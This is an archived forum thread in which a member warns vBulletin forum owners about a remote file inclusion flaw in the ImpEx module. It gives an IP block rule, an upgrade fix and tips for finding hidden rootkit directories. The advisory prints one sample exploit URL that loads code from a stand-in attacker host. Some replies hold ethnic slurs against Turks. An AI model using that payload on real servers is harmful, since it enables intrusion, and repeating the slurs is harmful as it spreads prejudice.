|
|
|
||||
|
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
![]() |
|
|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
|
Thread Tools |
|
|
#1 |
|
Confirmed User
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
|
ALERT for all Forum owners running vBulletin.
SplitInfinity Here letting you know that....
There is a known Turkish hacker group targeting the adult industry. The vBulletin ImpEX module contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ImpExData.php not properly sanitizing user input supplied to the 'systempath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. First, you should immediately block this class C: ipchains -A input -j REJECT -s 85.107.191.0/24 -d 0/0 -p all For some reason, they keep using the same ips. Lame hackers. :-) I have tracked them down and done some stuff to stop them from what they are doing.... however you should be warned that if you run vBulletin they will be hitting you soon! So far they have taken out over 10,000 sites as reported on securityfocus. Vulnerability Classification: * Remote/Network Access Required * Input Manipulation * Loss Of Integrity * Exploit Available * Verified * Web Related Products: * vBulletin ImpEx Module 1.74 ( http://www.vbulletin.com/docs/html/impex ) Solution: Upgrade to version 1.75 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Manual Testing Notes: http://[target]/impex/ImpExData.php?systempath=http://[attacker]/evil.txt? Where the hackers play... http://www.sanalinfaz.com/forumm/sho...=6140#post6140 They will use the exploit to install mech, eggdrops, backdoors to your server and more. I list below some common places they plant their files.... Places to check: /tmp /var/tmp/ /var/tmp/ssh /var/tmp/root /var/tmp/ Look for a file simply named "a" it is a backdoor. That list is NOT all inclusive as different groups will run different root kits for the same exploit.... Look for hidden directories by hitting TAB. Example: ls -la total 20 drwxr-xr-x 3 apache apache 4096 Apr 22 03:58 drwxrwxrwt 3 root root 4096 May 13 13:20 . drwxr-xr-x 24 root root 4096 Jan 29 20:50 .. Notice the seemingly empty one on top? If it type: cd [TAB] I get this: cd \ /multi/ They used control characters to hide the name of the directory. It becomes exposed when tab completion has a go at it. They basically named the directory " " space... :-) So, I cd into cd \ /multi/ and voila, all the rootkits and irc shit they run is in there. :-) total 1360 drwxr-xr-x 4 apache apache 4096 Apr 23 00:00 . drwxr-xr-x 3 apache apache 4096 Apr 22 03:58 .. -rw-r--r-- 1 apache apache 454 Apr 24 07:08 `2Skeletzi.seen -rw-r--r-- 1 apache apache 143 Apr 24 07:08 `50Cent.seen -rw-r--r-- 1 apache apache 647 Apr 24 07:08 `50Centz.seen -rw-r--r-- 1 apache apache 887 Apr 24 07:08 `5OCentz.seen -rwxr-xr-x 1 apache apache 12 Dec 26 01:51 acycmech -rw-r--r-- 1 apache apache 1163 Apr 24 07:08 Adriana``.seen -rw-r--r-- 1 apache apache 527 Apr 24 07:08 Alexandreta.seen -rw-r--r-- 1 apache apache 712 Apr 24 07:08 Al`Quaida.seen -rw-r--r-- 1 apache apache 452 Apr 24 07:08 A-Tentat`.seen -rw-r--r-- 1 apache apache 435 Apr 24 07:08 Aurora.seen -rw-r--r-- 1 apache apache 234 Apr 24 07:08 BadBoy^.seen -rw-r--r-- 1 apache apache 276 Apr 24 07:08 BaxDeCd`ie.seen -rw-r--r-- 1 apache apache 941 Apr 24 07:08 B`Nicolita.seen -rw-r--r-- 1 apache apache 878 Apr 24 07:08 Boxe.seen -rw-r--r-- 1 apache apache 363 Apr 24 07:08 BUG`Mafia.seen -rw-r--r-- 1 apache apache 842 Apr 24 07:08 C0Sty.seen -rw-r--r-- 1 apache apache 620 Apr 24 07:08 CaracalCity.seen -rw-r--r-- 1 apache apache 799 Apr 24 07:08 caracalmwe.seen -rw-r--r-- 1 apache apache 339 Apr 24 07:08 CaracalTown.seen -rw-r--r-- 1 apache apache 1019 Apr 24 07:08 CartieruHCC.seen -rw-r--r-- 1 apache apache 692 Apr 24 07:08 CartierulHCC.seen -rw-r--r-- 1 apache apache 581 Apr 24 07:08 CartziDeJoc.seen Etc.... the list goes on |
|
|
|
|
|
#2 |
|
I help you SUCCEED
Industry Role:
Join Date: Nov 2003
Location: The Pearl of the Orient Seas
Posts: 32,195
|
Thanks for the heads up!
|
|
|
|
|
|
#3 |
|
When it rains, it pours
Industry Role:
Join Date: May 2003
Posts: 20,609
|
darn Turkish hackers
they want my sig now? ![]() |
|
|
|
|
|
#4 |
|
Confirmed User
Join Date: Jan 2005
Posts: 2,270
|
hence proving my point chris is by far the whitest cracker here
__________________
E-mail marketing - Automation Scripting - IP Space AIM: splitjoelp ICQ: 254759453 skype - splitjoelp 702-941-6465 |
|
|
|
|
|
#5 |
|
Confirmed User
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
|
Thanks.
My opinion is that by sharing the info I find, I help secure everyone, not just my customers. However, it does put my customers in a good place, dont it? :-) Love ya all... |
|
|
|
|
|
#6 |
|
Confirmed User
Join Date: Feb 2006
Posts: 2,594
|
Thank you very much!!
|
|
|
|
|
|
#7 |
|
Too lazy to set a custom title
Industry Role:
Join Date: May 2001
Location: My network is hosted at TECHIEMEDIA.net ...Wait, you meant where am *I* located at? Oh... okay, I'm in Winnipeg, Canada. Oops. :)
Posts: 51,460
|
Bump, if only to piss off the turkish hackers.
__________________
Promote Wildmatch, ImLive, Sexier.com, and more!! ![]() ALWAYS THE HIGHEST PAYOUTS: Big Bux/ImLive SIGNUP ON NOW!!! ![]() Put some PUSSYCA$H in your pocket. ICQ me at: 31024634 |
|
|
|
|
|
#8 |
|
I need a beer
![]() Industry Role:
Join Date: Jun 2002
Location: ♠ Toiletville ♠
Posts: 133,947
|
Here's a bump for TD
__________________
|
|
|
|
|
|
#9 |
|
8.8.8.8
Industry Role:
Join Date: Mar 2006
Location: Noordermarkt
Posts: 30,509
|
thanks for the update
__________________
TAEMDLRMSKRJIXMRLSMRJ. |
|
|
|
|
|
#10 |
|
Registered User
Join Date: May 2006
Location: England
Posts: 19
|
Sounds like those Ottoman Empire hackers, they arenhahaha8217;t just hacking the adult industry its all western sites, propaganda saying u attack our homes blah blah we attack your websites
|
|
|
|
|
|
#11 |
|
Confirmed User
Industry Role:
Join Date: Nov 2003
Location: Olongapo City, Philippines
Posts: 4,618
|
will this hack work on windows servers?
|
|
|
|
|
|
#12 |
|
jellyfish
Join Date: Dec 2003
Posts: 71,528
|
thx for the headsup
|
|
|
|
|
|
#13 | |
|
Confirmed User
Industry Role:
Join Date: Nov 2003
Location: Olongapo City, Philippines
Posts: 4,618
|
Quote:
That's the vBulletin ImpEx Module version 1.74. It's in vBulletin 3.5 (don't know what earlier versions it's also in or if they are susceptible). |
|
|
|
|
|
|
#14 |
|
Webmaster Extraordinaire
Industry Role:
Join Date: Jul 2002
Location: A beautiful beach...
Posts: 10,748
|
turkish people who don't like porn... hmm... is there anything they like, other than ugly women and hashish?
|
|
|
|
|
|
#15 |
|
Confirmed User
Join Date: Nov 2005
Posts: 2,167
|
Rofl. Good work. You're only like 3 months too late. All that was supposed to be hacked was already hacked by now.
__________________
agentGFY *at* gmail.com |
|
|
|
|
|
#16 |
|
Confirmed User
Join Date: Aug 2004
Location: The Netherlands
Posts: 6,589
|
going to work on that soon, thx for the heads u[
|
|
|
|
|
|
#17 |
|
Confirmed User
Join Date: Aug 2004
Location: The Netherlands
Posts: 6,589
|
going to work on that soon, thx for the heads up
|
|
|
|
|
|
#18 |
|
♥♥♥ Likes Hugs ♥♥♥
Industry Role:
Join Date: Nov 2001
Location: /home
Posts: 15,841
|
Nice geek detective work. I'm impressed.
__________________
I like pie. |
|
|
|
|
|
#19 |
|
<&(©¿©)&>
Industry Role:
Join Date: Jul 2002
Location: Chicago
Posts: 47,882
|
with a properly secured server it should be impossible to own a site with this exploit...
![]()
__________________
Custom Software Development, email: woj#at#wojfun#.#com to discuss details or skype: wojl2000 or gchat: wojfun or telegram: wojl2000 Affiliate program tools: Hosted Galleries Manager Banner Manager Video Manager ![]() Wordpress Affiliate Plugin Pic/Movie of the Day Fansign Generator Zip Manager |
|
|
|
|
|
#20 |
|
Too lazy to set a custom title
Join Date: Sep 2005
Location: New York
Posts: 4,944
|
just hell with turkish hacker, they even don't know english
|
|
|
|
|
|
#21 | |
|
So Fucking Banned
|
Quote:
|
|
|
|
|
|
|
#22 |
|
www.barely18movies.com
Join Date: Feb 2003
Location: Melbourne, Australia
Posts: 10,920
|
Cyber Jihad!!!
__________________
|
|
|
|
|
|
#23 |
|
Confirmed User
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
|
Woj, not everyone has a properly secured server because the programs they run have unknown exploits, that BECOME exploits after they are discovered.
|
|
|
|
|
|
#24 |
|
Confirmed User
Join Date: Nov 2004
Location: Southern CA
Posts: 2,466
|
Ah, Thanks for the heads up!
|
|
|
|
|
|
#25 |
|
Confirmed User
Join Date: Aug 2005
Location: ICQ: 248877409
Posts: 8,597
|
great heads up
|
|
|
|
|
|
#26 |
|
Confirmed User
Join Date: Mar 2006
Location: bizarredollars.com
Posts: 1,582
|
Thanks for the info!!
|
|
|
|
|
|
#27 |
|
President of Canada
Join Date: Sep 2003
Location: Leaving Hell, Entering Limbo
Posts: 23,141
|
I want my GFY Money for nothin' and pics for free. |
|
|
|
|
|
#28 | |
|
Confirmed User
Join Date: Jan 2005
Posts: 2,270
|
Quote:
__________________
E-mail marketing - Automation Scripting - IP Space AIM: splitjoelp ICQ: 254759453 skype - splitjoelp 702-941-6465 |
|
|
|
|
|
|
#29 |
|
Confirmed User
Join Date: Mar 2006
Location: Illinois
Posts: 9,483
|
Thanks for heads up!
__________________
![]() BigCocks.com - MatureWomen.com - Tranny.com - DrunkGirls.com - TeenGirls.com - MonsterCock.com and many more... Click here to see them all! |
|
|
|